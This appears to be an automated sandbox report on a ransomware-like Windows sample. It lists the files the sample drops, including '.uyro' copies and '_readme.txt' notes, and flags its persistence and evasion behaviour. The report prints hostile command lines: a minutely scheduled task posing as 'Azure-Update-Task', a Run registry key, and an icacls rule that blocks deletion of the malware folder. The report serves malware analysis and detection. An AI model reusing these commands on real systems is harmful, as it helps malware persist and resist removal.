Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bs-Latn-BA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-US\msipc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SmiProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ms\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nn-NO\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca-Es-VALENCIA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ka\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gd\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lt\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Application Data\Application Data\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mi-NZ\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ru\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\am-ET\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OSProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-CN\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\az-Latn-AZ\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tk-TM\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hr\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\TransmogProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\he\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nb-NO\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ky\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\km-KH\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mt-MT\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build2[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ro\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\tmpCDDA.tmp.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ml-IN\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sl\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ja\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ta\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kok\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\be\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\is\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nso-ZA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tg\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mn\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pl\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\tmpCDDA.tmp Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lb-LU\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SetupPlatformProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\xh-ZA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sk\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fil-PH\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\it\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tt\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tn-ZA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\th\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\rw\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\CR_4BAC1.tmp\setup.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ga-IE\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\el\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kk\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ig-NG\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\or-IN\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zu-ZA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\wo\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\as-IN\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\da\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ar\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ku-Arab\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ur\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\UnattendProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hi\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ko\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uz-Latn-UZ\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-IN\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-TW\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\es\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bg\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hu\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ug\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\et\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa-Arab-PK\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\prs-AF\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lv\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gu\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\af\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cs\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-GB\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fa\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\yo-NG\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-RS\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\si-LK\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\WimProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ha-Latn-NG\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-BA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\_readme.txt Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\_readme.txt Jump to behavior

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 1_2_00481920
Uses cacls to modify the permissions of files
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe TID: 2852 Thread sleep time: -700000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 4684 Thread sleep count: 346 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 4684 Thread sleep time: -77850s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 348 Thread sleep count: 593 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Thread delayed: delay time: 700000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 593
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sd-Arab-PK\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\VhdProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\MsiProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-BR\FileSync.LocalizedResources.dll.mui Jump to dropped file
